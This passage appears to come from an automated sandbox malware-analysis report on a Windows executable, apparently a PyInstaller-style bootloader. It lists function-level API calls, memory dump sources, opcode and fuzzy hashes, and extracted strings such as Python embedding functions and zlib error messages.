• Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
• Instruction Fuzzy Hash: 85F04F46B0920680FE657A61DC61AB5C2805F84B80FCD89B0C94DCA3D2DF1DF4808230
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF70AF00D00,?,?,?,00007FF70AF0236A,?,?,?,?,?,00007FF70AF03B59), ref: 00007FF70AF0D6AA
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                      • Instruction ID: e14ee3cf04d34127004069ba82dc187481a9ee47ac0b7e00eb176b0da9320a45
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FF0D412A0A34685FE6476A1DC51A79D2905F94BA1FC847B0DD2ECA3D2DF6DF4808630
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF5830
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF5842
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF5879
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF588B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF58A4
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF58B6
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF58CF
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF58E1
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF58FD
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF590F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF592B
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF593D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF5959
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF596B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF5987
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF5999
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF59B5
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF70AEF64BF,?,00007FF70AEF336E), ref: 00007FF70AEF59C7
                                                                                                                                                                                                                                      Strings
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 199729137-653951865
• Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
• Instruction ID: 3ae1ba6c7feea0d69bff46b7f5ddf52eacfc4dd7090b78bdc46ac3b03b067f87
• Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
• Instruction Fuzzy Hash: F0228C26A4EB47D2FA59BB55EC551B4A2A0EF18795FC490B9C82E02360FF3CF5498270
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 808467561-2761157908
• Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
• Instruction ID: 801667d3d435f902b798758c7542725e12f008919bf0a076a982b0191e7fba25
• Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
• Instruction Fuzzy Hash: 16B2B1B3A182828AF7659F64D840BFDB7A1FF94389F905175DA0E57B84DB38F9008B50
Strings
Similarity
• API ID:
• String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
• API String ID: 0-2665694366
• Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
• Instruction ID: 1c57e1d8a643af64cb9cbf51fec3132a6c21ba1a5e7f2bf9fb0fc4458a10d643
• Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
• Instruction Fuzzy Hash: 58520673A146A68BE794AF14D859B7E7BADFF44340F818139E64A87780DB3CE840CB50
APIs
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
• Instruction ID: fdc104fc572063648e3f76c845ccde831fa8fbc938e16f1b42218220352ab1db
• Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
• Instruction Fuzzy Hash: A8311D73609A8186FB60AF60EC803EEA364FB84748F84443ADA4D47B95EF7CD548C720
APIs
• _get_daylight.LIBCMT ref: 00007FF70AF15CB5
  • Part of subcall function 00007FF70AF15608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70AF1561C
  • Part of subcall function 00007FF70AF0A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9CE
  • Part of subcall function 00007FF70AF0A9B8: GetLastError.KERNEL32(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9D8
  • Part of subcall function 00007FF70AF0A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF70AF0A94F,?,?,?,?,?,00007FF70AF0A83A), ref: 00007FF70AF0A979
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF0A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF70AF0A94F,?,?,?,?,?,00007FF70AF0A83A), ref: 00007FF70AF0A99E
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15CA4
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF15668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70AF1567C
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15F1A
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15F2B
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15F3C
                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF70AF1617C), ref: 00007FF70AF15F63
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4070488512-0
                                                                                                                                                                                                                                      • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                      • Instruction ID: 0fbee262e90e9278d75975231a5bc8bd2d88ab7ea718ebdcd4d121d47bd69b91
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1ED19A63E0825286FB20FF26DC415B9A661EF84798FC08176EA4D87786EF3CF4418760
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                                                      • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                      • Instruction ID: 80f7fa2c9fa347ed8872a57be45972699fe5fa640826ec1bef6388f1fd996f7d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4314D33618B8186EB60AB25EC406AEB7A4FB88798F940135EA8D47B54EF3CD155CB10
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2227656907-0
                                                                                                                                                                                                                                      • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                      • Instruction ID: 6bebf4c2e426c1b82415be9fd44164bcba8503f1684fb09b00d0baae400f1fa5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12B19123B1869681FA61EB22DD405B9E2A1EF44BE4F844279EA9D47B85EF3CF441C314
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15F1A
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF15668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70AF1567C
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15F2B
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF15608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70AF1561C
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15F3C
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF15638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70AF1564C
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF0A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9CE
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF0A9B8: GetLastError.KERNEL32(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9D8
                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF70AF1617C), ref: 00007FF70AF15F63
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3458911817-0
                                                                                                                                                                                                                                      • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                      • Instruction ID: cc5bba006f3810bbe9dbe8396a72f8f4cae0ef5cee69fd76735e82df9d8d1c49
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79514C23A1864286F720FF25DD815A9E760BF88784FC491BAEA4D87796DF3CF4408760
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                      • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                      • Instruction ID: 102d7a3294b779a1f9679992ff74748dd7ee708ebcbed372a55612fc00cac4fc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62111526B14B06CAFB00EB60EC552A973A4FB19758F840E31EA6D867A4DF7CE1598350
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy_s
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1502251526-0
                                                                                                                                                                                                                                      • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                      • Instruction ID: e8b96e30af1f513ff306eba93a2df213b7c7a66cf93f28148f6fc7502b16ad7f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7C1E2B3A1868A87E724DF1AE444A6AF7A1FB94784F848234DB4A57744DB3DF805CB40
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                      • API String ID: 0-1127688429
                                                                                                                                                                                                                                      • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                      • Instruction ID: f905bf86bb7fc2562f8da26a0b67a5b366a1ecbec21c196a917f33f86351ef21
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94F17463A183D64AF795BF14C889B3ABBA9EF44780FC64578DA4D4B390CB38E541C750
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 15204871-0
                                                                                                                                                                                                                                      • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                      • Instruction ID: b76cdd9d03158d683286fdc733a905c868561873bad91a369f4ca774fcb89b87
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5B1BF73A04B898BEB19CF29C89236CBBE0FB44B48F548861DB5D837A4CB79E451C750
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: $
                                                                                                                                                                                                                                      • API String ID: 0-227171996
                                                                                                                                                                                                                                      • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                      • Instruction ID: 7ab937d1cb919448a7d2eecc6c57d16b9c7e627f4900669ffbac0ac19e015c40
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAE1E377A0864686FB68AF29C85093DB3A0FF45B48F954375DA4E8B694CF39F841C720
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                      • API String ID: 0-900081337
                                                                                                                                                                                                                                      • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
